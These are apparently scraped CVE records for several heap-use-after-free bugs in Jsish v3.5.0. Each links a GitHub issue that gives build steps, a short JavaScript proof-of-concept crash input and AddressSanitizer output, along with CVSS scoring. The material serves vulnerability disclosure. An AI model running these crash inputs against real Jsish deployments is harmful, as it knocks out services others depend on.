"Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/82" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/82" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/82
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript function JSEtest() { var buf = setInterval(function () { ws.send('0'); }, 40)(update(Object(0))); } try { JSEtest(); } catch (e) { setInterval(Function.prototype, 40); } ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==66060==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000001f0 at pc 0x56055c54b6fc bp 0x7ffc737457e0 sp 0x7ffc737457d0 READ of size 4 at 0x6030000001f0 thread T0 #0 0x56055c54b6fb in DeleteTreeValue src/jsiObj.c:176 #1 0x56055c563384 in Jsi_TreeEntryDelete src/jsiTree.c:636 #2 0x56055c564f10 in destroy_node src/jsiTree.c:496 #3 0x56055c564f10 in destroy_node src/jsiTree.c:494 #4 0x56055c564f10 in Jsi_TreeDelete src/jsiTree.c:515 #5 0x56055c54d9df in Jsi_ObjFree src/jsiObj.c:348 #6 0x56055c54ea0f in Jsi_ObjDecrRefCount src/jsiObj.c:440 #7 0x56055c3fd3d1 in ValueFree src/jsiValue.c:178 #8 0x56055c3fd3d1 in Jsi_ValueFree src/jsiValue.c:199 #9 0x56055c3fd6cf in Jsi_DecrRefCount src/jsiValue.c:52 #10 0x56055c50d4d4 in Jsi_EventFree src/jsiCmds.c:204 #11 0x56055c4234e2 in freeEventTbl src/jsiInterp.c:570 #12 0x56055c4c58dd in Jsi_HashClear src/jsiHash.c:507 #13 0x56055c4c5cd7 in Jsi_HashDelete src/jsiHash.c:526 #14 0x56055c43687c in jsiInterpDelete src/jsiInterp.c:1936 #15 0x56055cc4d047 in jsi_main src/main.c:49 #16 0x7f78b6c29bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #17 0x56055c3dc969 in _start (/usr/local/bin/jsish+0xe8969) 0x6030000001f0 is located 0 bytes inside of 32-byte region [0x6030000001f0,0x603000000210) freed by thread T0 here: #0 0x7f78b78987a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x56055c3fd6cf in Jsi_DecrRefCount src/jsiValue.c:52 previously allocated by thread T0 here: #0 0x7f78b7898d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x56055c44daa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue Shadow bytes around the buggy address: 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd 0x0c067fff8010: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa 0x0c067fff8020: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd =>0x0c067fff8030: fa fa fd fd fd fd fa fa fd fd fd fd fa fa[fd]fd 0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8050: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8060: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8070: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8080: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==66060==ABORTING ```
Heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue
https://api.github.com/repos/pcmacdon/jsish/issues/82/comments
0
2021-12-24T10:48:59Z
2021-12-28T02:31:29Z
https://github.com/pcmacdon/jsish/issues/82
1,088,311,523
82
3,121
CVE-2021-46496
2022-01-27T21:15:08.870
Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_ObjFree in src/jsiObj.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/83" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/83
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var __instance = Object; __instance.exec = RegExp; try { $ERROR('Error' + (__instance.exec("1"))); } catch (e) { } ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==22083==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000127e8 at pc 0x5569eb9fb061 bp 0x7ffdf3af1950 sp 0x7ffdf3af1940 READ of size 4 at 0x6080000127e8 thread T0 #0 0x5569eb9fb060 in Jsi_ObjFree src/jsiObj.c:339 #1 0x5569eb8e3aa0 in jsiInterpDelete src/jsiInterp.c:1943 #2 0x5569ec0fa047 in jsi_main src/main.c:49 #3 0x7f90875e2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #4 0x5569eb889969 in _start (/usr/local/bin/jsish+0xe8969) 0x6080000127e8 is located 72 bytes inside of 96-byte region [0x6080000127a0,0x608000012800) freed by thread T0 here: #0 0x7f90882517a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x5569eb8cf073 in regExpFree src/jsiInterp.c:588 previously allocated by thread T0 here: #0 0x7f9088251d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x5569eb8faaa4 in Jsi_Calloc src/jsiUtils.c:57 #2 0x5569ec1a6faf (/usr/local/bin/jsish+0xa05faf) SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:339 in Jsi_ObjFree Shadow bytes around the buggy address: 0x0c107fffa4a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa4b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa4c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa4d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa4e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa =>0x0c107fffa4f0: fa fa fa fa fd fd fd fd fd fd fd fd fd[fd]fd fd 0x0c107fffa500: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa510: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fffa530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fffa540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==22083==ABORTING ```
MEMLEAK NOW: Heap-use-after-free src/jsiObj.c:339 in Jsi_ObjFree
https://api.github.com/repos/pcmacdon/jsish/issues/83/comments
2
2021-12-24T10:49:33Z
2021-12-28T02:31:03Z
https://github.com/pcmacdon/jsish/issues/83
1,088,311,780
83
3,122
CVE-2021-46497
2022-01-27T21:15:08.917
Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_UserObjDelete in src/jsiUserObj.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/84" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/84" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/84
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript try { WebSocket(new Object()); } catch (e) { } try { (Number)('wrong'); } catch (e) { } ``` ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==116852==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000000220 at pc 0x56117e352348 bp 0x7ffdd456fd30 sp 0x7ffdd456fd20 READ of size 4 at 0x608000000220 thread T0 #0 0x56117e352347 in jsi_UserObjDelete src/jsiUserObj.c:32 #1 0x56117e1a9a28 in freeUserdataTbl src/jsiInterp.c:660 #2 0x56117e24d8dd in Jsi_HashClear src/jsiHash.c:507 #3 0x56117e24dcd7 in Jsi_HashDelete src/jsiHash.c:526 #4 0x56117e1be7d8 in jsiInterpDelete src/jsiInterp.c:1935 #5 0x56117e9d5047 in jsi_main src/main.c:49 #6 0x7f876ebfebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #7 0x56117e164969 in _start (/usr/local/bin/jsish+0xe8969) 0x608000000220 is located 0 bytes inside of 96-byte region [0x608000000220,0x608000000280) freed by thread T0 here: #0 0x7f876f86d7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x56117e2d6a0f in Jsi_ObjDecrRefCount src/jsiObj.c:440 previously allocated by thread T0 here: #0 0x7f876f86dd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x56117e1d5aa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiUserObj.c:32 in jsi_UserObjDelete Shadow bytes around the buggy address: 0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c107fff8000: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8010: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8020: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8030: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c107fff8040: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8050: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8060: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8070: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8080: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c107fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==116852==ABORTING ```
Heap-use-after-free src/jsiUserObj.c:32 in jsi_UserObjDelete
https://api.github.com/repos/pcmacdon/jsish/issues/84/comments
0
2021-12-24T10:50:28Z
2021-12-27T16:51:37Z
https://github.com/pcmacdon/jsish/issues/84
1,088,312,235
84
3,123
CVE-2021-46498
2022-01-27T21:15:08.957
Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_wswebsocketObjFree in src/jsiWebSocket.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/81" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/81" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/81
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript console.printf= (new WebSocket); setTimeout(console, 100000); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js =====ERROR: AddressSanitizer: heap-use-after-free on address 0x61b000000080 at pc 0x55b167ed6de6 bp 0x7ffcd360f220 sp 0x7ffcd360f210 READ of size 4 at 0x61b000000080 thread T0 #0 0x55b167ed6de5 in jsi_wswebsocketObjFree src/jsiWebSocket.c:3190 #1 0x55b167e7ba2d in jsi_UserObjFree src/jsiUserObj.c:75 #2 0x55b167dfeefb in Jsi_ObjFree src/jsiObj.c:334 #3 0x55b167dffa0f in Jsi_ObjDecrRefCount src/jsiObj.c:440 #4 0x55b167cae3d1 in ValueFree src/jsiValue.c:178 #5 0x55b167cae3d1 in Jsi_ValueFree src/jsiValue.c:199 #6 0x55b167cae6cf in Jsi_DecrRefCount src/jsiValue.c:52 #7 0x55b167dfc697 in DeleteTreeValue src/jsiObj.c:177 #8 0x55b167e14384 in Jsi_TreeEntryDelete src/jsiTree.c:636 #9 0x55b167e15f10 in destroy_node src/jsiTree.c:496 #10 0x55b167e15f10 in destroy_node src/jsiTree.c:494 #11 0x55b167e15f10 in Jsi_TreeDelete src/jsiTree.c:515 #12 0x55b167dfe9df in Jsi_ObjFree src/jsiObj.c:348 #13 0x55b167dffa0f in Jsi_ObjDecrRefCount src/jsiObj.c:440 #14 0x55b167cae3d1 in ValueFree src/jsiValue.c:178 #15 0x55b167cae3d1 in Jsi_ValueFree src/jsiValue.c:199 #16 0x55b167cae6cf in Jsi_DecrRefCount src/jsiValue.c:52 #17 0x55b167dbe4d4 in Jsi_EventFree src/jsiCmds.c:204 #18 0x55b167cd44e2 in freeEventTbl src/jsiInterp.c:570 #19 0x55b167d768dd in Jsi_HashClear src/jsiHash.c:507 #20 0x55b167d76cd7 in Jsi_HashDelete src/jsiHash.c:526 #21 0x55b167ce787c in jsiInterpDelete src/jsiInterp.c:1936 #22 0x55b1684fe047 in jsi_main src/main.c:49 #23 0x7f5c2d555bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #24 0x55b167c8d969 in _start (/usr/local/bin/jsish+0xe8969) 0x61b000000080 is located 0 bytes inside of 1656-byte region [0x61b000000080,0x61b0000006f8) freed by thread T0 here: #0 0x7f5c2e1c47a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x55b167ed6d22 in jsi_wswebsocketObjFree src/jsiWebSocket.c:3199 previously allocated by thread T0 here: #0 0x7f5c2e1c4d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55b167cfeaa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree Shadow bytes around the buggy address: 0x0c367fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c367fff8010:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c367fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree
https://api.github.com/repos/pcmacdon/jsish/issues/81/comments
0
2021-12-24T10:48:23Z
2021-12-28T02:31:29Z
https://github.com/pcmacdon/jsish/issues/81
1,088,311,213
81
3,124
CVE-2021-46499
2022-01-27T21:15:09.003
Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueCopyMove in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/76" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/76" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/76
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript function JSEtest(){} var arr = /x?y?z?/.exec("abcd"); arr[arr[1000] = 3](arr.every(JSEtest), arr[1000] = 3, '1') ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==99189==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000006e84 at pc 0x5637792b29cd bp 0x7ffef5f97e60 sp 0x7ffef5f97e50 READ of size 4 at 0x603000006e84 thread T0 #0 0x5637792b29cc in jsi_ValueCopyMove src/jsiValue.c:245 #1 0x5637792b29cc in Jsi_ValueCopy src/jsiValue.c:301 #2 0x5637795f6759 in jsi_ObjArraySetDup src/jsiEval.c:1054 #3 0x5637795f6759 in jsi_ValueObjKeyAssign src/jsiEval.c:1079 #4 0x5637795f6759 in jsiEvalCodeSub src/jsiEval.c:1303 #5 0x5637795fd15e in jsi_evalcode src/jsiEval.c:2204 #6 0x563779601274 in jsi_evalStrFile src/jsiEval.c:2665 #7 0x5637792f066a in Jsi_Main src/jsiInterp.c:936 #8 0x563779af503a in jsi_main src/main.c:47 #9 0x7f66650eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #10 0x563779284969 in _start (/usr/local/bin/jsish+0xe8969) 0x603000006e84 is located 4 bytes inside of 32-byte region [0x603000006e80,0x603000006ea0) freed by thread T0 here: #0 0x7f6665d5d7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x5637792a56cf in Jsi_DecrRefCount src/jsiValue.c:52 previously allocated by thread T0 here: #0 0x7f6665d5dd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x5637792f5aa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove Shadow bytes around the buggy address: 0x0c067fff8d80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8d90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8da0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8db0: fa fa fd fd fd fd fa fa 00 00 04 fa fa fa 00 00 0x0c067fff8dc0: 04 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa =>0x0c067fff8dd0:[fd]fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd 0x0c067fff8de0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8df0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8e00: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa 0x0c067fff8e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==99189==ABORTING ``` Credits: Found by OWL337 team.
Heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove
